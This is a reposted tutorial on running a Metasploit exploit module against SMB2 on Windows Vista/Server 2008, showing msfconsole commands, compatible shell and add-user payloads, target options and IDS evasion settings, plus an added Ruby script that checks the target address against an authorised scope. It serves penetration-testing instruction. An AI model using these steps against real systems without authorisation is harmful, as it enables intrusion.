Metasploit Usage Explained (How to Use Exploits in Metasploit)

Selecting an exploit module in Metasploit adds the 'exploit' and 'check' commands to msfconsole.

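    msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    msf exploit(ms09_050_smb2_negotiate_func_index) > help
    ...snip...

    Exploit Commands
    ================

        Command   Description
        -------   -----------
        check     Check whether the target is vulnerable
        exploit   Launch an exploit attempt
        pry       Open a Pry session on the current module
        rcheck    Reload the module and check whether the target is vulnerable
        reload    Just reload the module
        rerun     Alias for re-running the exploit
        rexploit  Reload the module and launch an exploit attempt
        run       Alias for running the exploit

    msf exploit(ms09_050_smb2_negotiate_func_index) >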

show

Using an exploit module also adds more options to the 'show' command.

MSF Exploit Targets:

    msf exploit(ms09_050_smb2_negotiate_func_index) > show targets

    Exploit targets:

       Id  Name
       --  ----
       0   Windows Vista SP1/SP2 and Server 2008 (x86)

MSF Exploit Payloads:

    msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads

    Compatible Payloads
    ===================

       Name                       Disclosure Date  Rank    Description
       ----                       ---------------  ----    -----------
       generic/custom                              normal  Custom Payload
       generic/debug_trap                          normal  Generic x86 Debug Trap
       generic/shell_bind_tcp                      normal  Generic Command Shell, Bind TCP Inline
       generic/shell_reverse_tcp                   normal  Generic Command Shell, Reverse TCP Inline
       generic/tight_loop                          normal  Generic x86 Tight Loop
       windows/adduser                             normal  Windows Execute net user /ADD
    ...snip...

MSF Exploit Options:

    msf exploit(ms09_050_smb2_negotiate_func_index) > show options

    Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.1.136    yes       The target address
       RPORT  445              yes       The target port (TCP)
       WAIT   180              yes       The number of seconds to wait for the attack to complete.

    Exploit target:

       Id  Name
       --  ----
       0   Windows Vista SP1/SP2 and Server 2008 (x86)

Advanced:

    msf exploit(ms09_050_smb2_negotiate_func_index) > show advanced

    Module advanced options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

       Name                    Current Setting  Required  Description
       ----                    ---------------  --------  -----------
       CHOST                                    no        The local client address
       CPORT                                    no        The local client port
       ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
       ContextInformationFile                   no        The information file that contains context information
       DisablePayloadHandler   false            no        Disable the handler code for the selected payload
       EnableContextEncoding   false            no        Use transient context when encoding payloads
    ...snip...
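For keeping an engagement record, the option tables shown above can be parsed and checked against the authorised scope. The Ruby code below is an added example, not part of the original article or of Metasploit itself: the names `parse_options` and `preflight`, the CIDR ranges and the constructed sample rows (page values plus the empty CHOST row from the advanced table) are assumptions for illustration.

```ruby
require 'ipaddr'

# Constructed sample rows; values mirror the page, CHOST has an empty setting.
ROWS = [
  ['Name', 'Current Setting', 'Required', 'Description'],
  ['----', '---------------', '--------', '-----------'],
  ['RHOST', '192.168.1.136', 'yes', 'The target address'],
  ['RPORT', '445', 'yes', 'The target port (TCP)'],
  ['CHOST', '', 'no', 'The local client address']
].freeze
# Rendered in the fixed-width layout msfconsole uses for option tables.
SAMPLE = ROWS.map { |r| format('   %-5s  %-15s  %-8s  %s', *r) }.join("\n")

# Slice each row at the column offsets given by the dashed rule line, so an
# empty "Current Setting" cell does not shift the later columns.
def parse_options(text)
  lines = text.lines.map(&:chomp)
  rule = lines.index { |l| l.match?(/\A\s*-+(\s+-+)+\s*\z/) }
  return [] if rule.nil?

  starts = []
  lines[rule].scan(/-+/) { starts << Regexp.last_match.begin(0) }
  lines[(rule + 1)..].take_while { |l| !l.strip.empty? }.map do |l|
    cells = starts.each_with_index.map do |s, i|
      l[s...(starts[i + 1] || l.length)].to_s.strip
    end
    %i[name setting required description].zip(cells).to_h
  end
end

# Report required options left unset and an RHOST outside the authorised range.
def preflight(options, scope_cidr)
  scope = IPAddr.new(scope_cidr)
  issues = options.select { |o| o[:required] == 'yes' && o[:setting].empty? }
                  .map { |o| "#{o[:name]} is required but unset" }
  rhost = options.find { |o| o[:name] == 'RHOST' }
  return issues if rhost.nil? || rhost[:setting].empty?

  begin
    inside = scope.include?(IPAddr.new(rhost[:setting]))
    issues << "RHOST #{rhost[:setting]} is outside #{scope_cidr}" unless inside
  rescue IPAddr::InvalidAddressError
    issues << "RHOST #{rhost[:setting]} is not an IP literal; resolve and recheck"
  end
  issues
end

puts preflight(parse_options(SAMPLE), '192.168.1.0/24').inspect if $PROGRAM_NAME == __FILE__
```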

Evasion:

    msf exploit(ms09_050_smb2_negotiate_func_index) > show evasion

    Module evasion options:

       Name                           Current Setting  Required  Description
       ----                           ---------------  --------  -----------
       SMB::obscure_trans_pipe_level  0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)
       SMB::pad_data_level            0                yes       Place extra padding between headers and data (level 0-3)
       SMB::pad_file_level            0                yes       Obscure path names used in open/create (level 0-3)
       SMB::pipe_evasion              false            yes       Enable segmented read/writes for SMB Pipes
       SMB::pipe_read_max_size        1024             yes       Maximum buffer size for pipe reads
       SMB::pipe_read_min_size        1                yes       Minimum buffer size for pipe reads
       SMB::pipe_write_max_size       1024             yes       Maximum buffer size for pipe writes
       SMB::pipe_write_min_size       1                yes       Minimum buffer size for pipe writes
       TCP::max_send_size             0                no        Maxiumum tcp segment size. (0 = disable)
       TCP::send_delay                0                no        Delays inserted before every send. (0 = disable)

Reposted from: https://www.fujieace.com/metasploit/exploits.html
